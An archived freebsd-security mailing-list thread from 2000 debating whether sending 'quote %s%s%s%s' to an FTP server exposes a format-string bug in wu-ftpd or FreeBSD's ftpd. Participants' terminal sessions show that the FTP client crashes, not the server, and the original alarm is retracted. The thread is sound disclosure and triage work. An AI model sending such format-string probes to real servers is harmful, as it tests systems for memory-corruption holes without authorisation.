But it was our hill and they were our beans." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:18:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 8C0ED37B66C for ; Mon, 2 Oct 2000 11:18:43 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA07584 for ; Mon, 2 Oct 2000 12:18:32 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002113441.04932240@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 12:18:25 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: ftpd bug in FreeBSD through at least 3.4 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen I administer, and have been wondering why. Perhaps this message explains it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch up until at least 3.4-RELEASE (maybe later). Am not sure to what extent this bug can be exploited. At best, it would probably just let someone run things as the user "ftp" (the euid used for anonymous FTP logins). This might make it possible to finesse a known local root exploit into a remote one, and/or to start an automated password cracking process (a la the RTM worm) on the system. At worst, it might be possible to parlay it into something worse. --Brett >Approved-By: aleph1@SECURITYFOCUS.COM >Delivered-To: bugtraq@lists.securityfocus.com >Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78]) by > lists.securityfocus.com (Postfix) with SMTP id 259D024C7F5 for > ; Mon, 2 Oct 2000 08:27:37 -0700 > (PDT) >Received: (qmail 21295 invoked by alias); 2 Oct 2000 15:29:30 -0000 >Delivered-To: BUGTRAQ@SECURITYFOCUS.COM >Received: (qmail 21292 invoked from network); 2 Oct 2000 15:29:29 -0000 >Received: from unknown (HELO mail.multigroup-bg.com) (212.36.2.250) by > mail.securityfocus.com with SMTP; 2 Oct 2000 15:29:29 -0000 >Received: from mgoracle2000 ([192.168.32.220]) by mail.multigroup-bg.com > (8.9.3/8.9.3) with SMTP id SAA32372 for ; > Mon, 2 Oct 2000 18:28:32 +0300 >MIME-Version: 1.0 >Content-Type: text/plain; charset="iso-8859-1" >Content-Transfer-Encoding: 8bit >X-Priority: 3 >X-MSMail-Priority: Normal >X-Mailer: Microsoft Outlook Express 5.50.4133.2400 >X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 >Message-ID: <001301c02c8d$ca506090$dc20a8c0@mgoracle2000> >Date: Mon, 2 Oct 2000 18:28:26 +0200 >Reply-To: Javor Ninov >Sender: Bugtraq List >From: Javor Ninov >Organization: MG Bulgaria >Subject: Wu-ftpd 2.6.1(1) >To: BUGTRAQ@SECURITYFOCUS.COM >X-UIDL: 34a5d41e2d991fbaee20ab8924544a45 > >somewhere:/$ ftp 127.0.0.1 >Connected to 1127.0.0.1. >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59 >EEST 2000) ready. >Name (0:somebody): ftp >331 Guest login ok, send your complete e-mail address as password. >Password: >230-Welcome, archive user! This is an experimental FTP server. If have any >230-unusual problems, please report them via e-mail to >root@somewhere.in.internet >230-If you do have problems, please try using a dash (-) as the first >character >230-of your password -- this will turn off the continuation messages that >may >230-be confusing your ftp client. >230- >230 Guest login ok, access restrictions apply. >Remote system type is UNIX. >Using binary mode to transfer files. >ftp> quote %s%s%s%s >500 'TP¿9(NULL)': command not understood. >ftp>quote %s%s%s%s%s >Segmentation fault >somewhere:/$ uname -a >Linux somewhere 2.2.12 #1 Sun Sep 19 13:35:59 EEST 1999 i686 unknown >somewhere:/$ >This is a Slackware 4.0 with last wuftpd.tgz ( 02-oct-2000 ) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:23:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 3D33C37B503 for ; Mon, 2 Oct 2000 11:23:19 -0700 (PDT) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id PAA26733; Mon, 2 Oct 2000 15:24:17 -0300 (ART) From: Fernando Schapachnik Message-Id: <200010021824.PAA26733@ns1.via-net-works.net.ar> Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <4.3.2.7.2.20001002113441.04932240@localhost> "from Brett Glass at Oct 2, 2000 12:18:25 pm" To: Brett Glass Date: Mon, 2 Oct 2000 15:24:17 -0300 (ART) Cc: security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This describes a bug in wu-ftp, not in BSD-ftpd. Please double check before scaring us all. Regards! En un mensaje anterior, Brett Glass escribió: > I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen > I administer, and have been wondering why. Perhaps this message explains > it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch > up until at least 3.4-RELEASE (maybe later). [...]] > >Connected to 1127.0.0.1. > >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59 > >EEST 2000) ready. Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:29:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 2A43E37B503 for ; Mon, 2 Oct 2000 11:29:13 -0700 (PDT) Received: by pawn.primelocation.net (Postfix, from userid 1016) id B51C09B1F; Mon, 2 Oct 2000 14:29:11 -0400 (EDT) Date: Mon, 2 Oct 2000 14:29:11 -0400 From: "Chris D . Faulhaber" To: Brett Glass Cc: security@FreeBSD.org Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001002142911.A25948@pawn.primelocation.net> References: <4.3.2.7.2.20001002113441.04932240@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001002113441.04932240@localhost>; from brett@lariat.org on Mon, Oct 02, 2000 at 12:18:25PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 02, 2000 at 12:18:25PM -0600, Brett Glass wrote: > I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen > I administer, and have been wondering why. Perhaps this message explains > it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch > up until at least 3.4-RELEASE (maybe later). > The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1 and 4.1[.1] don't seem affected. ----- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:30:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 707C037B503 for ; Mon, 2 Oct 2000 11:30:39 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA07690; Mon, 2 Oct 2000 12:30:17 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002122853.04b25e00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 12:30:08 -0600 To: Fernando Schapachnik From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: security@FreeBSD.ORG In-Reply-To: <200010021824.PAA26733@ns1.via-net-works.net.ar> References: <4.3.2.7.2.20001002113441.04932240@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Fernando: I did NOT make a mistake. It works in FreeBSD's own ftpd in FreeBSD 3.4 and earlier; maybe some later versions as well. --Brett At 12:24 PM 10/2/2000, Fernando Schapachnik wrote: >This describes a bug in wu-ftp, not in BSD-ftpd. > >Please double check before scaring us all. > >Regards! > >En un mensaje anterior, Brett Glass escribió: >> I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen >> I administer, and have been wondering why. Perhaps this message explains >> it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch >> up until at least 3.4-RELEASE (maybe later). >[...]] >> >Connected to 1127.0.0.1. >> >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59 >> >EEST 2000) ready. > > > > >Fernando P. Schapachnik >Administración de la red >VIA NET.WORKS ARGENTINA S.A. >fernando@via-net-works.net.ar >(54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:34:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 3F65937B502 for ; Mon, 2 Oct 2000 11:34:19 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA07743; Mon, 2 Oct 2000 12:33:53 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002123113.049344d0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 12:33:47 -0600 To: "Chris D . Faulhaber" From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: security@FreeBSD.org In-Reply-To: <20001002142911.A25948@pawn.primelocation.net> References: <4.3.2.7.2.20001002113441.04932240@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:29 PM 10/2/2000, Chris D . Faulhaber wrote: >The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1 >and 4.1[.1] don't seem affected. It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions I have tested. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:41:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from amazhan.bitstream.net (amazhan.bitstream.net [216.243.128.132]) by hub.freebsd.org (Postfix) with SMTP id 4BE5E37B66C for ; Mon, 2 Oct 2000 11:41:10 -0700 (PDT) Received: (qmail 40667 invoked from network); 2 Oct 2000 18:41:09 -0000 Received: from unknown (HELO dmitri.bitstream.net) (216.243.132.33) by amazhan with SMTP; 2 Oct 2000 18:41:09 -0000 Date: Mon, 2 Oct 2000 13:42:27 -0500 (CDT) From: Dan Debertin To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <4.3.2.7.2.20001002113441.04932240@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I realize that there have been quite a few advisories related to wu-ftpd lately. However, looking at the example you quote below, it looks as if it is the Linux FTP _client_ that is SEGVing, not the server. Would a server tell the remote end that it has segfaulted? No. Run strace on your ftp client, and you'll see the SEGV.=20 ~Dan D. - -- ++ Dan Debertin ++ Senior Systems Administrator ++ Bitstream Underground, LLC ++ airboss@bitstream.net ++ (612)321-9290 ++ GPG Fingerprint: 0BC5 F4D6 649F D0C8 D1A7 CAE4 BEF4 0A5C 300D 2387 On Mon, 2 Oct 2000, Brett Glass wrote: > >somewhere:/$ ftp 127.0.0.1 > >Connected to 1127.0.0.1. > >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:4= 9:59 > >EEST 2000) ready. > >Name (0:somebody): ftp > >331 Guest login ok, send your complete e-mail address as password. > >Password: > >230-Welcome, archive user! This is an experimental FTP server. If have= any > >230-unusual problems, please report them via e-mail to > >root@somewhere.in.internet > >230-If you do have problems, please try using a dash (-) as the first > >character > >230-of your password -- this will turn off the continuation messages tha= t > >may > >230-be confusing your ftp client. > >230- > >230 Guest login ok, access restrictions apply. > >Remote system type is UNIX. > >Using binary mode to transfer files. > >ftp> quote %s%s%s%s > >500 'TP=BF9(NULL)': command not understood. > >ftp>quote %s%s%s%s%s > >Segmentation fault > >somewhere:/$ uname -a > >Linux somewhere 2.2.12 #1 Sun Sep 19 13:35:59 EEST 1999 i686 unknown > >somewhere:/$ > >This is a Slackware 4.0 with last wuftpd.tgz ( 02-oct-2000 ) >=20 >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message >=20 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.3 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjnY1yMACgkQvvQKXDANI4davgCfSU1nVIlMxbORHc+HFOtCqtA6 kf0AoKczYisCzr9UPbPbEHzGmO/sop1b =3D6ICM -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:43:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (flutter.freebsd.dk [212.242.40.147]) by hub.freebsd.org (Postfix) with ESMTP id B228237B502 for ; Mon, 2 Oct 2000 11:43:27 -0700 (PDT) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.0/8.9.3) with ESMTP id e92IZxN21324; Mon, 2 Oct 2000 20:35:59 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Brett Glass Cc: "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: Your message of "Mon, 02 Oct 2000 12:33:47 MDT." <4.3.2.7.2.20001002123113.049344d0@localhost> Date: Mon, 02 Oct 2000 20:35:59 +0200 Message-ID: <21322.970511759@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001002123113.049344d0@localhost>, Brett Glass writes: >At 12:29 PM 10/2/2000, Chris D . Faulhaber wrote: > >>The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1 >>and 4.1[.1] don't seem affected. > >It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions >I have tested. 3.4 is a dead branch, 2.x even more so. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:46: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id 97D4B37B502 for ; Mon, 2 Oct 2000 11:46:01 -0700 (PDT) Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 13gAac-000FBX-00; Mon, 02 Oct 2000 20:45:26 +0200 Date: Mon, 2 Oct 2000 20:45:26 +0200 From: Neil Blakey-Milner To: Brett Glass Cc: "Chris D . Faulhaber" , security@FreeBSD.org Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001002204526.A58098@mithrandr.moria.org> References: <4.3.2.7.2.20001002113441.04932240@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> <20001002142911.A25948@pawn.primelocation.net> <4.3.2.7.2.20001002123113.049344d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001002123113.049344d0@localhost>; from brett@lariat.org on Mon, Oct 02, 2000 at 12:33:47PM -0600 Organization: Sunesi Clinical Systems X-Operating-System: FreeBSD 3.3-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon 2000-10-02 (12:33), Brett Glass wrote: > At 12:29 PM 10/2/2000, Chris D . Faulhaber wrote: > > >The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1 > >and 4.1[.1] don't seem affected. > > It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions > I have tested. This is quite cute: (nbm@futon) /home/nbm> ftp 127.0.0.1 Connected to 127.0.0.1. 220 futon.sunesi.com FTP server (Version 6.00) ready. Name (127.0.0.1:nbm): ftp 331 Guest login ok, send your email address as password. Password: 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> quote %s%s%s%s Segmentation fault As in, it crashes the ftp client. A 4.0 ftp client connecting to 'futon' (a 3.3 machine): (nbm@couch) /home/nbm> ftp futon Connected to futon.sunesi.com. 220 futon.sunesi.com FTP server (Version 6.00) ready. Name (futon.sunesi.com:nbm): ftp 331 Guest login ok, send your email address as password. Password: 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> quot %s%s%s%s 500 '%S%S%S%S': command not understood. A 3.4 ftp client to 'futon' also segfaults. The ftp server doesn't segfault in the cases I've tried. Neil -- Neil Blakey-Milner Sunesi Clinical Systems nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:50:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 0B9AE37B503 for ; Mon, 2 Oct 2000 11:50:16 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (5224 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 2 Oct 2000 13:48:48 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 2 Oct 2000 13:48:48 -0500 (CDT) From: James Wyatt To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <4.3.2.7.2.20001002113441.04932240@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Uh, Brett the FreeBSD and Linux ftpd differ a *lot*! You'll get more mail. That aside, this segfaults the client on the command line. Read my lips, "no new privelages". (Like most of the Pine bugs discussed earlier. (^_^) It's even easier to duplicate than the original post. You can do it on a failed login and needs only one %s to coredump. (Should the FreeBSD client leave a core file, btw?) Try this: =09goodguy@bsdie-/tmp: ftp 127.1 =09Connected to 127.1. =09220 mybox.my.net FTP server (Version 6.00) ready. =09Name (127.1:goodguy): root =09530 User root access denied. =09ftp: Login failed. =09Remote system type is UNIX. =09Using binary mode to transfer files. =09ftp> quote %s =09Segmentation fault (core dumped) Hope this helps clarify things a little.. - Jy@ On Mon, 2 Oct 2000, Brett Glass wrote: > Date: Mon, 02 Oct 2000 12:18:25 -0600 > From: Brett Glass > To: security@FreeBSD.ORG > Subject: ftpd bug in FreeBSD through at least 3.4 >=20 > I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen > I administer, and have been wondering why. Perhaps this message explains > it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch= =20 > up until at least 3.4-RELEASE (maybe later). >=20 > Am not sure to what extent this bug can be exploited. At best, it would > probably just let someone run things as the user "ftp" (the euid used for= =20 > anonymous FTP logins). This might make it possible to finesse a known > local root exploit into a remote one, and/or to start an automated > password cracking process (a la the RTM worm) on the system. At worst, > it might be possible to parlay it into something worse. >=20 > --Brett >=20 >=20 > >Approved-By: aleph1@SECURITYFOCUS.COM > >Delivered-To: bugtraq@lists.securityfocus.com > >Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78= ]) by > > lists.securityfocus.com (Postfix) with SMTP id 259D024C7F5 for > > ; Mon, 2 Oct 2000 08:27:37 -= 0700 > > (PDT) > >Received: (qmail 21295 invoked by alias); 2 Oct 2000 15:29:30 -0000 > >Delivered-To: BUGTRAQ@SECURITYFOCUS.COM > >Received: (qmail 21292 invoked from network); 2 Oct 2000 15:29:29 -0000 > >Received: from unknown (HELO mail.multigroup-bg.com) (212.36.2.250) by > > mail.securityfocus.com with SMTP; 2 Oct 2000 15:29:29 -0000 > >Received: from mgoracle2000 ([192.168.32.220]) by mail.multigroup-bg.com > > (8.9.3/8.9.3) with SMTP id SAA32372 for ; > > Mon, 2 Oct 2000 18:28:32 +0300 > >MIME-Version: 1.0 > >Content-Type: text/plain; charset=3D"iso-8859-1" > >Content-Transfer-Encoding: 8bit > >X-Priority: 3 > >X-MSMail-Priority: Normal > >X-Mailer: Microsoft Outlook Express 5.50.4133.2400 > >X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 > >Message-ID: <001301c02c8d$ca506090$dc20a8c0@mgoracle2000> > >Date: Mon, 2 Oct 2000 18:28:26 +0200 > >Reply-To: Javor Ninov > >Sender: Bugtraq List > >From: Javor Ninov > >Organization: MG Bulgaria > >Subject: Wu-ftpd 2.6.1(1) > >To: BUGTRAQ@SECURITYFOCUS.COM > >X-UIDL: 34a5d41e2d991fbaee20ab8924544a45 > > > >somewhere:/$ ftp 127.0.0.1 > >Connected to 1127.0.0.1. > >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:4= 9:59 > >EEST 2000) ready. > >Name (0:somebody): ftp > >331 Guest login ok, send your complete e-mail address as password. > >Password: > >230-Welcome, archive user! This is an experimental FTP server. If have= any > >230-unusual problems, please report them via e-mail to > >root@somewhere.in.internet > >230-If you do have problems, please try using a dash (-) as the first > >character > >230-of your password -- this will turn off the continuation messages tha= t > >may > >230-be confusing your ftp client. > >230- > >230 Guest login ok, access restrictions apply. > >Remote system type is UNIX. > >Using binary mode to transfer files. > >ftp> quote %s%s%s%s > >500 'TP=BF9(NULL)': command not understood. > >ftp>quote %s%s%s%s%s > >Segmentation fault > >somewhere:/$ uname -a > >Linux somewhere 2.2.12 #1 Sun Sep 19 13:35:59 EEST 1999 i686 unknown > >somewhere:/$ > >This is a Slackware 4.0 with last wuftpd.tgz ( 02-oct-2000 ) >=20 >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message >=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:50:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id CDE2437B66C for ; Mon, 2 Oct 2000 11:50:22 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA07892; Mon, 2 Oct 2000 12:47:59 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002124607.00df8150@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 12:47:53 -0600 To: Poul-Henning Kamp From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: "Chris D . Faulhaber" , security@FreeBSD.ORG In-Reply-To: <21322.970511759@critter> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote: >3.4 is a dead branch, 2.x even more so. People are still running it 3.x, though. LOTS of people. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:52:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 5269E37B502 for ; Mon, 2 Oct 2000 11:52:20 -0700 (PDT) Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0/8.11.0) with ESMTP id e92IpK692184; Mon, 2 Oct 2000 13:51:20 -0500 (CDT) Date: Mon, 2 Oct 2000 13:51:20 -0500 (CDT) From: Alex Charalabidis To: Brett Glass Cc: "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <4.3.2.7.2.20001002123113.049344d0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Brett Glass wrote: > At 12:29 PM 10/2/2000, Chris D . Faulhaber wrote: > > >The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1 > >and 4.1[.1] don't seem affected. > > It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions > I have tested. > Yes it does. It was posted to bugtraq as a proftpd bug on 25 Jul 00 by Carlos Eduardo Gorges . I confirmed the bug existed on our 6.00LS too (and promptly forgot :P). As far as I know, there have been no exploits and it's not even a DoS since the parent process is unaffected. The default FreeBSD ftp client crashes before the server process does, so you can only see the problem with a client on a different OS (oddly enough, the MS-DOS 7 client seems to be the only one that creates no problems at all). -ac -- ============================================================== Alex Charalabidis (AC8139) 5050 Poplar Ave, Ste 170 Systems Administrator Memphis, TN 38157 WebNet Memphis (901) 432 6000 Author, The Book of IRC http://www.bookofirc.com/ ============================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:55: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 6F70D37B66D for ; Mon, 2 Oct 2000 11:54:57 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA07987; Mon, 2 Oct 2000 12:54:52 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002124915.00d51820@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 12:54:46 -0600 To: Dan Debertin From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: security@FreeBSD.ORG In-Reply-To: References: <4.3.2.7.2.20001002113441.04932240@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:42 PM 10/2/2000, Dan Debertin wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >I realize that there have been quite a few advisories related to wu-ftpd >lately. However, looking at the example you quote below, it looks as if it >is the Linux FTP _client_ that is SEGVing, not the server. Would a server >tell the remote end that it has segfaulted? No. Run strace on your ftp >client, and you'll see the SEGV. Just looked at this, and you seem to be correct. The message does, for some reason, seem to be originating in the client. This means that while there is a bug it is not likely to be exploitable. Whew! --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:55: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (flutter.freebsd.dk [212.242.40.147]) by hub.freebsd.org (Postfix) with ESMTP id 0F07637B66C for ; Mon, 2 Oct 2000 11:54:57 -0700 (PDT) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.0/8.9.3) with ESMTP id e92IslN21500; Mon, 2 Oct 2000 20:54:47 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Brett Glass Cc: "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: Your message of "Mon, 02 Oct 2000 12:47:53 MDT." <4.3.2.7.2.20001002124607.00df8150@localhost> Date: Mon, 02 Oct 2000 20:54:47 +0200 Message-ID: <21498.970512887@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001002124607.00df8150@localhost>, Brett Glass writes: >At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote: > >>3.4 is a 